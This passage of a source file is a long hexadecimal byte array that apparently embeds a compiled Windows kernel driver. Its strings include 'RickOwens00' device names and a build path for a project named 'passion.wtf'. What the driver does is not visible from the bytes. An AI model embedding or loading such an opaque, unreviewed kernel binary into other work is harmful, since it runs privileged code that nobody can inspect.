0x5A, 0x41, 0x58, 0x41, 0x59, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 382 | 0xCC, 0xCC, 0xCC, 0xCC, 0x5C, 0x00, 0x44, 0x00, 0x65, 0x00, 0x76, 0x00, 383 | 0x69, 0x00, 0x63, 0x00, 0x65, 0x00, 0x5C, 0x00, 0x52, 0x00, 0x69, 0x00, 384 | 0x63, 0x00, 0x6B, 0x00, 0x4F, 0x00, 0x77, 0x00, 0x65, 0x00, 0x6E, 0x00, 385 | 0x73, 0x00, 0x30, 0x00, 0x30, 0x00, 0x00, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 386 | 0xCC, 0xCC, 0xCC, 0xCC, 0x5C, 0x00, 0x44, 0x00, 0x6F, 0x00, 0x73, 0x00, 387 | 0x44, 0x00, 0x65, 0x00, 0x76, 0x00, 0x69, 0x00, 0x63, 0x00, 0x65, 0x00, 388 | 0x73, 0x00, 0x5C, 0x00, 0x52, 0x00, 0x69, 0x00, 0x63, 0x00, 0x6B, 0x00, 389 | 0x4F, 0x00, 0x77, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x30, 0x00, 390 | 0x30, 0x00, 0x00, 0x00, 0x5C, 0x00, 0x44, 0x00, 0x72, 0x00, 0x69, 0x00, 391 | 0x76, 0x00, 0x65, 0x00, 0x72, 0x00, 0x5C, 0x00, 0x52, 0x00, 0x69, 0x00, 392 | 0x63, 0x00, 0x6B, 0x00, 0x4F, 0x00, 0x77, 0x00, 0x65, 0x00, 0x6E, 0x00, 393 | 0x73, 0x00, 0x30, 0x00, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 394 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 395 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 396 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 397 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 398 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 399 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 400 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 401 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 402 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 403 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 404 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 405 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 406 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 407 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 408 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 409 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 410 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 411 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 412 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 413 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 414 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 415 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 416 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 417 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 418 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 419 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 420 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 421 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 422 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 423 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 424 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 425 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 426 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 427 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 428 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 429 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 430 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 431 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xA8, 0x50, 0x00, 0x00, 432 | 0x00, 0x00, 0x00, 0x00, 0xC0, 0x50, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 433 | 0xD0, 0x50, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE2, 0x50, 0x00, 0x00, 434 | 0x00, 0x00, 0x00, 0x00, 0xF4, 0x50, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 435 | 0x0A, 0x51, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1C, 0x51, 0x00, 0x00, 436 | 0x00, 0x00, 0x00, 0x00, 0x34, 0x51, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 437 | 0x4A, 0x51, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x62, 0x51, 0x00, 0x00, 438 | 0x00, 0x00, 0x00, 0x00, 0x72, 0x51, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 439 | 0x90, 0x51, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xA2, 0x51, 0x00, 0x00, 440 | 0x00, 0x00, 0x00, 0x00, 0xB8, 0x51, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 441 | 0xDA, 0x51, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 442 | 0x00, 0x00, 0x00, 0x00, 0x80, 0x18, 0x00, 0x40, 0x01, 0x00, 0x00, 0x00, 443 | 0xA0, 0x18, 0x00, 0x40, 0x01, 0x00, 0x00, 0x00, 0x80, 0x18, 0x00, 0x40, 444 | 0x01, 0x00, 0x00, 0x00, 0xC0, 0x18, 0x00, 0x40, 0x01, 0x00, 0x00, 0x00, 445 | 0xC0, 0x18, 0x00, 0x40, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 446 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x40, 0x10, 0x00, 0x00, 447 | 0x60, 0x10, 0x00, 0x00, 0xE0, 0x13, 0x00, 0x00, 0xC0, 0x17, 0x00, 0x00, 448 | 0x80, 0x18, 0x00, 0x00, 0x00, 0x1D, 0x00, 0x00, 0x80, 0x1D, 0x00, 0x00, 449 | 0x40, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 450 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 451 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 452 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 453 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 454 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 455 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 456 | 0x00, 0x00, 0x00, 0x00, 0x40, 0x30, 0x00, 0x40, 0x01, 0x00, 0x00, 0x00, 457 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 458 | 0x00, 0x00, 0x00, 0x00, 0x80, 0x20, 0x00, 0x40, 0x01, 0x00, 0x00, 0x00, 459 | 0x88, 0x20, 0x00, 0x40, 0x01, 0x00, 0x00, 0x00, 0xB0, 0x20, 0x00, 0x40, 460 | 0x01, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 461 | 0x00, 0x45, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 462 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 463 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 464 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 465 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 466 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 467 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 468 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 469 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 470 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 471 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 472 | 0x00, 0x00, 0x00, 0x00, 0x90, 0x20, 0x00, 0x40, 0x01, 0x00, 0x00, 0x00, 473 | 0x98, 0x20, 0x00, 0x40, 0x01, 0x00, 0x00, 0x00, 0xA0, 0x20, 0x00, 0x40, 474 | 0x01, 0x00, 0x00, 0x00, 0xA8, 0x20, 0x00, 0x40, 0x01, 0x00, 0x00, 0x00, 475 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 476 | 0x19, 0xD2, 0x07, 0x68, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 477 | 0x58, 0x00, 0x00, 0x00, 0x80, 0x22, 0x00, 0x00, 0x80, 0x16, 0x00, 0x00, 478 | 0x00, 0x00, 0x00, 0x00, 0x19, 0xD2, 0x07, 0x68, 0x00, 0x00, 0x00, 0x00, 479 | 0x0D, 0x00, 0x00, 0x00, 0x3C, 0x01, 0x00, 0x00, 0xD8, 0x22, 0x00, 0x00, 480 | 0xD8, 0x16, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 481 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 482 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 483 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 484 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 485 | 0x52, 0x53, 0x44, 0x53, 0x62, 0x0C, 0xA7, 0x30, 0x17, 0x2E, 0xF0, 0x43, 486 | 0xBF, 0x1D, 0xA8, 0xC9, 0xD4, 0x83, 0x39, 0x6C, 0x02, 0x00, 0x00, 0x00, 487 | 0x43, 0x3A, 0x5C, 0x55, 0x73, 0x65, 0x72, 0x73, 0x5C, 0x53, 0x69, 0x6D, 488 | 0x6F, 0x6E, 0x5C, 0x73, 0x6F, 0x75, 0x72, 0x63, 0x65, 0x5C, 0x72, 0x65, 489 | 0x70, 0x6F, 0x73, 0x5C, 0x70, 0x61, 0x73, 0x73, 0x69, 0x6F, 0x6E, 0x2E, 490 | 0x77, 0x74, 0x66, 0x5C, 0x62, 0x75, 0x69, 0x6C, 0x64, 0x5C, 0x64, 0x72, 491 | 0x69, 0x76, 0x65, 0x72, 0x5C, 0x64, 0x72, 0x69, 0x76, 0x65, 0x72, 0x2E, 492 | 0x70, 0x64, 0x62, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 493 | 0x90, 0x08, 0x00, 0x00, 0x2E, 0x74, 0x65, 0x78, 0x74, 0x24, 0x6D, 0x6E, 494 | 0x00, 0x00, 0x00, 0x00, 0x90, 0x18, 0x00, 0x00, 0x70, 0x00, 0x00, 0x00, 495 | 0x2E, 0x74, 0x65, 0x78, 0x74, 0x24, 0x6D, 0x6E, 0x24, 0x30, 0x30, 0x00, 496 | 0x00, 0x19, 0x00, 0x00, 0xB0, 0x04, 0x00, 0x00, 0x2E, 0x74, 0x65, 0x78, 497 | 0x74, 0x24, 0x6D, 0x6E, 0x24, 0x32, 0x31, 0x00, 0xB0, 0x1D, 0x00, 0x00, 498 | 0x88, 0x00, 0x00, 0x00, 0x2E, 0x74, 0x65, 0x78, 0x74, 0x24, 0x73, 0x00, 499 | 0x00, 0x20, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x2E, 0x69, 0x64, 0x61, 500 | 0x74, 0x61, 0x24, 0x35, 0x00, 0x00, 0x00, 0x00, 0x80, 0x20, 0x00, 0x00, 501 | 0x30, 0x00, 0x00, 0x00, 0x2E, 0x30, 0x30, 0x63, 0x66, 0x67, 0x00, 0x00, 502 | 0xB0, 0x20, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x2E, 0x67, 0x66, 0x69, 503 | 0x64, 0x73, 0x00, 0x00, 0xD0, 0x20, 0x00, 0x00, 0xB0, 0x01, 0x00, 0x00, 504 | 0x2E, 0x72, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x80, 0x22, 0x00, 0x00, 505 | 0xC0, 0x01, 0x00, 0x00, 0x2E, 0x72, 0x64, 0x61, 0x74, 0x61, 0x24, 0x7A, 506 | 0x7A, 0x7A, 0x64, 0x62, 0x67, 0x00, 0x00, 0x00, 0x40, 0x24, 0x00, 0x00, 507 | 0xD8, 0x00, 0x00, 0x00, 0x2E, 0x78, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 508 | 0x00, 0x30, 0x00, 0x00, 0x50, 0x00, 0x00, 0x00, 0x2E, 0x64, 0x61, 0x74, 509 | 0x61, 0x00, 0x00, 0x00, 0x50, 0x30, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 510 | 0x2E, 0x62, 0x73, 0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 511 | 0xE4, 0x00, 0x00, 0x00, 0x2E, 0x70, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 512 | 0x00, 0x50, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x2E, 0x69, 0x64, 0x61, 513 | 0x74, 0x61, 0x24, 0x32, 0x00, 0x00, 0x00, 0x00, 0x14, 0x50, 0x00, 0x00, 514 | 0x14, 0x00, 0x00, 0x00, 0x2E, 0x69, 0x64, 0x61, 0x74, 0x61, 0x24, 0x33, 515 | 0x00, 0x00, 0x00, 0x00, 0x28, 0x50, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 516 | 0x2E, 0x69, 0x64, 0x61, 0x74, 0x61, 0x24, 0x34, 0x00, 0x00, 0x00, 0x00, 517 | 0xA8, 0x50, 0x00, 0x00, 0x5C, 0x01, 0x00, 0x00, 0x2E, 0x69, 0x64, 0x61, 518 | 0x74, 0x61, 0x24, 0x36, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 519 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 520 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 521 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 522 | 0x00, 0x00, 0x00, 0x00, 0x02, 0x07, 0x04, 0x00, 0x01, 0x16, 0x00, 0x06, 523 | 0x07, 0x01, 0x29, 0x00, 0x02, 0x14, 0x0A, 0x00, 0x02, 0x16, 0x00, 0x06, 524 | 0x14, 0x64, 0x08, 0x00, 0x14, 0x54, 0x07, 0x00, 0x14, 0x34, 0x06, 0x00, 525 | 0x14, 0x32, 0x10, 0x70, 0x02, 0x06, 0x04, 0x00, 0x02, 0x16, 0x00, 0x06, 526 | 0x06, 0x32, 0x02, 0x30, 0x02, 0x16, 0x0A, 0x00, 0x0B, 0x16, 0x00, 0x06, 527 | 0x16, 0x72, 0x0F, 0xF0, 0x0D, 0xE0, 0x0B, 0xC0, 0x09, 0x70, 0x08, 0x60, 528 | 0x07, 0x30, 0x06, 0x50, 0x02, 0x10, 0x08, 0x00, 0x02, 0x16, 0x00, 0x06, 529 | 0x10, 0x64, 0x0A, 0x00, 0x10, 0x34, 0x09, 0x00, 0x10, 0x52, 0x0C, 0x70, 530 | 0x02, 0x04, 0x03, 0x00, 0x01, 0x16, 0x00, 0x06, 0x04, 0x42, 0x00, 0x00, 531 | 0x02, 0x18, 0x0C, 0x00, 0x06, 0x16, 0x00, 0x06, 0x18, 0x64, 0x0E, 0x00, 532 | 0x18, 0x54, 0x0D, 0x00, 0x18, 0x34, 0x0C, 0x00, 0x18, 0x72, 0x14, 0xF0, 533 | 0x12, 0xE0, 0x10, 0x70, 0x02, 0x0D, 0x06, 0x00, 0x02, 0x16, 0x00, 0x06, 534 | 0x0D, 0x34, 0x0E, 0x00, 0x0D, 0xB2, 0x06, 0x50, 0x02, 0x04, 0x03, 0x00, 535 | 0x01, 0x16, 0x00, 0x06, 0x04, 0x62, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 536 | 0x00, 0x00, 0x00, 0x00, 0x02, 0x01, 0x03, 0x00, 0x02, 0x06, 0x09, 0x06, 537 | 0x01, 0x70, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x0B, 0x08, 0x00, 538 | 0x08, 0x16, 0x00, 0x06, 0x0B, 0x52, 0x07, 0x00, 0x06, 0x10, 0x05, 0x20, 539 | 0x04, 0x80, 0x02, 0x90, 0x02, 0x06, 0x04, 0x00, 0x02, 0x06, 0x03, 0x06, 540 | 0x06, 0x12, 0x02, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 541 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 542 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 543 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 544 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 545 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 546 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 547 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 548 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 549 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 550 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 551 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 552 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 553 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 554 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 555 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 556 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 557 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 558 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 559 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 560 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 561 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 562 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 563 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 564 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 565 | 0x32, 0xA2, 0xDF, 0x2D, 0x99, 0x2B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 566 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 567 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 568 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 569 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 570 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 571 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 572 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 573 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 574 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 575 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 576 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 577 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 578 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 579 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 580 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 581 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 582 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 583 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 584 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 585 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 586 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 587 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 588 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 589 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 590 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 591 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 592 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 593 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 594 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 595 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 596 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 597 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 598 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 599 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 600 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 601 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 602 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x35, 0x10, 0x00, 0x00, 603 | 0xD4, 0x24, 0x00, 0x00, 0x40, 0x10, 0x00, 0x00, 0x5D, 0x10, 0x00, 0x00, 604 | 0x64, 0x24, 0x00, 0x00, 0x60, 0x10, 0x00, 0x00, 0x3C, 0x11, 0x00, 0x00, 605 | 0xC4, 0x24, 0x00, 0x00, 0x3C, 0x11, 0x00, 0x00, 0x84, 0x11, 0x00, 0x00, 606 | 0x9C, 0x24, 0x00, 0x00, 0x84, 0x11, 0x00, 0x00, 0xA9, 0x11, 0x00, 0x00, 607 | 0x64, 0x24, 0x00, 0x00, 0xAC, 0x11, 0x00, 0x00, 0x13, 0x12, 0x00, 0x00, 608 | 0x40, 0x24, 0x00, 0x00, 0x14, 0x12, 0x00, 0x00, 0x84, 0x12, 0x00, 0x00, 609 | 0x64, 0x24, 0x00, 0x00, 0x84, 0x12, 0x00, 0x00, 0xF5, 0x12, 0x00, 0x00, 610 | 0x9C, 0x24, 0x00, 0x00, 0xF8, 0x12, 0x00, 0x00, 0xD8, 0x13, 0x00, 0x00, 611 | 0x88, 0x24, 0x00, 0x00, 0xE0, 0x13, 0x00, 0x00, 0xA8, 0x15, 0x00, 0x00, 612 | 0xA8, 0x24, 0x00, 0x00, 0xA8, 0x15, 0x00, 0x00, 